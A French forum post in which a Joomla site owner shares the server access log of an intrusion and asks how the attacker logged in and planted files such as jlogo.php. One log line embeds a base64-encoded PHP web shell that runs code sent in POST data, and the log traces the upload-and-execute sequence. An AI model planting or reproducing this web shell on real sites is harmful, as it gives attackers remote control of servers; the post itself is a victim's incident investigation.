Discussion :

[Mister Paul]

Bonjour,

mon vieux site sous Joomla a été hacké.
Ça s'est passé en plusieurs temps :
ils ont placé dans le dossier /images
jlogo.php.jpg
jlogo.php

Ensuite ces fichiers ont été appelés et ont disséminé un peu partout dans le site d'autres fichiers vérolés...

J'essaie de comprendre comment ils ont pu placer ces fichiers...
Sur le fichier logs du serveur je crois voir (je découvre la lecture des logs) qu'ils se sont logués très vite sur la page d'administration (3 essais) après ils ont récupéré les infos serveur, config. Puis ils ont installé leur matériel.

Code :

Sélectionner tout - Visualiser dans une fenêtre à part

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
185.93.187.66 - - [14/Aug/2016:15:24:45 +0200] "GET /administrator/ HTTP/1.0" 200 4693 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36"
185.93.187.66 - - [14/Aug/2016:15:24:45 +0200] "GET /administrator/ HTTP/1.0" 200 4693 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36"
185.93.187.66 - - [14/Aug/2016:15:24:45 +0200] "GET /administrator/ HTTP/1.0" 200 32750 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36"
185.93.187.66 - - [14/Aug/2016:15:24:46 +0200] "GET /administrator/?option=com_config HTTP/1.0" 200 62319 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36"
185.93.187.66 - - [14/Aug/2016:15:24:47 +0200] "GET /administrator/?option=com_admin&task=sysinfo HTTP/1.0" 200 84748 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36"
185.93.187.66 - - [14/Aug/2016:15:24:47 +0200] "GET /administrator/?option=com_installer HTTP/1.0" 200 21051 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36"
185.93.187.66 - - [14/Aug/2016:15:24:48 +0200] "POST /administrator/ HTTP/1.0" 200 21385 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36"
185.93.187.66 - - [14/Aug/2016:15:24:48 +0200] "POST /templates/jtemplate/jtemplate.php HTTP/1.0" 200 37031 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36"
185.93.187.66 - - [14/Aug/2016:15:24:49 +0200] "GET /administrator/?option=com_installer HTTP/1.0" 200 21051 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36"
185.93.187.66 - - [14/Aug/2016:15:24:50 +0200] "POST /administrator/ HTTP/1.0" 200 21385 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36"
185.93.187.66 - - [14/Aug/2016:15:24:50 +0200] "POST /modules/mod_jmodule/mod_jmodule.php HTTP/1.0" 200 37035 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36"
185.93.187.66 - - [14/Aug/2016:15:24:51 +0200] "GET /administrator/?option=com_installer HTTP/1.0" 200 21051 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36"
185.93.187.66 - - [14/Aug/2016:15:24:51 +0200] "POST /administrator/ HTTP/1.0" 200 21385 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36"
185.93.187.66 - - [14/Aug/2016:15:24:52 +0200] "POST /plugins/jplugin/jplugin.php HTTP/1.0" 200 37032 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36"
185.93.187.66 - - [14/Aug/2016:15:24:53 +0200] "GET /administrator/?option=com_installer HTTP/1.0" 200 21051 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36"
185.93.187.66 - - [14/Aug/2016:15:24:53 +0200] "POST /administrator/ HTTP/1.0" 200 21385 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36"
185.93.187.66 - - [14/Aug/2016:15:24:54 +0200] "POST /administrator/templates/jtemplate/jtemplate.php HTTP/1.0" 200 37098 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36"
185.93.187.66 - - [14/Aug/2016:15:24:55 +0200] "GET /administrator/?option=com_installer HTTP/1.0" 200 21051 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36"
185.93.187.66 - - [14/Aug/2016:15:24:55 +0200] "POST /administrator/ HTTP/1.0" 200 21385 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36"
185.93.187.66 - - [14/Aug/2016:15:24:56 +0200] "POST /administrator/modules/mod_jmodule/mod_jmodule.php HTTP/1.0" 200 37093 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36"
185.93.187.66 - - [14/Aug/2016:15:24:57 +0200] "GET /administrator/?option=com_installer HTTP/1.0" 200 21051 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36"
185.93.187.66 - - [14/Aug/2016:15:24:57 +0200] "POST /administrator/ HTTP/1.0" 200 21602 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36"
185.93.187.66 - - [14/Aug/2016:15:24:58 +0200] "POST /tmp/plain;base64,PD9waHAgQGFzc2VydChAYmFzZTY0X2RlY29kZShAc3RyX3JvdDEzKCRfUE9TVFsiZGF0YSJdKSkpOz8+;.php HTTP/1.0" 200 37271 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36"
185.93.187.66 - - [14/Aug/2016:15:24:58 +0200] "GET /administrator/?option=com_media HTTP/1.0" 200 32779 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36"
185.93.187.66 - - [14/Aug/2016:15:24:59 +0200] "POST /administrator/ HTTP/1.0" 200 1730 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36"
185.93.187.66 - - [14/Aug/2016:15:25:00 +0200] "POST /images/jlogo.php. HTTP/1.0" 404 281 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36"
185.93.187.66 - - [14/Aug/2016:15:25:00 +0200] "POST /images/jlogo.php HTTP/1.0" 200 36994 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36"
185.93.187.66 - - [14/Aug/2016:15:25:01 +0200] "GET /administrator/?option=com_media HTTP/1.0" 200 32779 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36"
185.93.187.66 - - [14/Aug/2016:15:25:01 +0200] "POST /administrator/ HTTP/1.0" 200 1687 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36"
185.93.187.66 - - [14/Aug/2016:15:25:02 +0200] "POST /images/jlogo.php.jpg HTTP/1.0" 200 3131 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36"
185.93.187.66 - - [14/Aug/2016:15:25:02 +0200] "GET /administrator/?option=com_config HTTP/1.0" 200 62319 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36"
185.93.187.66 - - [14/Aug/2016:15:25:02 +0200] "POST /administrator/ HTTP/1.0" 301 - "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36"
185.93.187.66 - - [14/Aug/2016:15:25:03 +0200] "GET /administrator/index.php HTTP/1.0" 200 32931 "http://pxxxx.phpnet.org/administrator/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36"
185.93.187.66 - - [14/Aug/2016:15:25:04 +0200] "GET /administrator/?option=com_media HTTP/1.0" 200 32779 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36"
185.93.187.66 - - [14/Aug/2016:15:25:05 +0200] "POST /administrator/ HTTP/1.0" 200 1687 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36"
185.93.187.66 - - [14/Aug/2016:15:25:05 +0200] "POST /images/jlogo.php HTTP/1.0" 200 10 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36"

Ils se sont connectés très vite, non ? Seulement à la 3ème tentative c'est ce que vous comprenez ?

Code :

Sélectionner tout - Visualiser dans une fenêtre à part

GET /administrator/ HTTP/1.0" 200 32750

Les autres ne renvoyaient que 4693 octets 32750 sur la 3ème
Mais je me trompe peut-être...

Merci pour vos lumières !
Paul